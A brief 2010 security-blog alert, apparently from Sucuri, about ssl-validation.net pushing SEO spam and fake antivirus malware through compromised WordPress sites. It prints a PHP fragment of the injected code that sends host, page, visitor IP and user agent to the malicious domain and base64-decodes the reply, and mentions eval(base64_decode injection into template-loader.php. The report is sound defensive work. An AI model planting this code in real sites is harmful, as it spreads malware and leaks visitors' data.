Malware update – ssl-validation.net

  • September 3, 2010

Quick malware update: The site ssl-validation.net (nice name) is being used to distribute SEO spam and malware (Rhe famous fake AV, say it ain’t so).

You can get details of the code being used here: http://sucuri.net/?page=tools&title=blacklist&detail=7ea73e3ac775b52b945d5b45a5abb7ad

$outsourceurl="http://ssl-validation.net/gt.php?site=”.urlencode($_SERVER[‘HTTP_HOST’]).’&page=’.urlencode($_SERVER[‘REQUEST_URI’]).’&ip=’.urlencode($_SERVER[‘REMOTE_ADDR’]).’&agent=’.urlencode($_SERVER[‘HTTP_USER_AGENT’]);
$links = base64_decode(file_get_contents($outsourceurl));

Most of the time, it is inserting an eval(base64_decode inside the template-loader.php file from WordPress.

The malicious site is hosted at 95.211.108.146.

Suggestion for hosting companies: Block this IP.

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
2 comments
  1. Pingback: Tweets that mention Malware update – ssl-validation.net | Sucuri -- Topsy.com
  2. Pingback: Malware update: ssl-verification.net | Sucuri

Comments are closed.

Related Categories
You May Also Like